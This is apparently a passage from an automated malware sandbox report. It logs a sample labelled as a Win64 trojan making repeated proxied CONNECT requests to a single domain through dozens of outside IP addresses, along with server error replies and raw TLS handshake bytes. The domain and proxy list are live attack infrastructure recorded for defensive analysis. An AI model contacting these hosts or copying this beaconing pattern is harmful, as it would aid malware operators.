                                                                                Feb 23, 2024 14:28:42.358175993 CET594INData Raw: 02 05 03 03 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b
                                                                                Data Ascii: 0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[w
                                                                                Feb 23, 2024 14:28:43.012118101 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ac d5 54 77 1d 4a 81 e2 b7 10 c2 ce 15 32 dc 5a e3 3b 8f 53 fb fe ed 79 93 6d 09 e0 b4 c4 9e 11 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 13 b2 d4 31 7a bf 4f de 78 dc da bc 35 93 e0 2d a6 27 fc d3 2c
                                                                                Data Ascii: %! TwJ2Z;Sym(1zOx5-',cE6
                                                                                Feb 23, 2024 14:28:43.448481083 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1e 00 c0 2c d5 f9 b2 cc 79 2d dc cb 42 44 aa c9 0d 08 f5 6a 18 b2 76 77 01 c1 59 43 83 83 f2 1b 7b f1 24 b9 f4 72 d3 c1 f7 44 a0 32 fa 48 a6 c9 7d 17 82 b2 99 df 23 20 d0 38 a2 a5 aa ab dd 92 15 6e 21 00 c2 d0
                                                                                Data Ascii: ,y-BDjvwYC{$rD2H}# 8n!>G!0dLXKP-C4X>>@4A\b,O"~dOhy\:Kdb8}z1P,W"cz(jJ5z


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1416192.168.2.85424114.97.48.44805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.201904058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1417192.168.2.853624164.132.170.100805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.226862907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.255043983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.398264885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1418192.168.2.852543162.214.191.248483465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.227056026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1419192.168.2.852742193.30.13.189995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.227250099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1420192.168.2.852494103.76.253.6631295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.256731987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.397910118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.398458004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1421192.168.2.85256391.134.140.16091415828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.256736040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820470095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1422192.168.2.852700183.100.14.13480005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.279946089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.561242104 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:36 GMT
                                                                                Server: Apache
                                                                                Content-Length: 534
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 68 65 6c 70 40 67 65 6e 69 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at help@geninetworks.com to inform them of the time this


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1423192.168.2.852793154.12.253.232576615828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.294542074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820425987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382702112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.491909981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581836939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.695060968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789026022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1424192.168.2.854234199.58.184.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.308239937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1425192.168.2.85412639.165.0.13790025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.334347010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.274226904 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1426192.168.2.852642161.97.170.20922965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.408545017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.398175001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.398456097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1427192.168.2.85368367.201.33.10252835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.425492048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1428192.168.2.85367791.134.140.160122175828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.426002026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1429192.168.2.8526298.222.188.14831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.466892958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.548041105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.585839987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1430192.168.2.853681122.155.223.165102035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.468564034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.548105955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1431192.168.2.852714122.114.232.1378085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.468888044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1432192.168.2.85381947.90.126.7881185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.643781900 CET132INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.
                                                                                Feb 23, 2024 14:28:37.068172932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1433192.168.2.854233115.171.217.4878915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.702428102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1434192.168.2.85420424.249.199.441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.945808887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1435192.168.2.853775203.161.32.218592205828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.964313030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.991966009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065788031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.194856882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.194708109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.201044083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:25.226094961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1436192.168.2.852841202.12.80.11835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:36.986435890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.991940975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.992322922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.991718054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.991664886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1437192.168.2.854237109.194.22.6180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.024005890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1438192.168.2.853743159.223.71.71625725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.044291973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1439192.168.2.852878103.244.163.11631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.044333935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.124094009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.195507050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.194931984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.194770098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1440192.168.2.853312184.181.217.20141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.053678989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1441192.168.2.852874103.228.246.13060605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.054018021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.124202013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1442192.168.2.85385841.184.212.341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.054110050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1443192.168.2.8540215.161.98.204581995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.068185091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382525921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.695066929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.389516115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.695216894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.992018938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.398226976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992130995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.849992990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1444192.168.2.852938196.15.237.19718885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.101366997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1445192.168.2.853809103.48.68.28835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.101568937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1446192.168.2.85398492.205.108.94299615828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
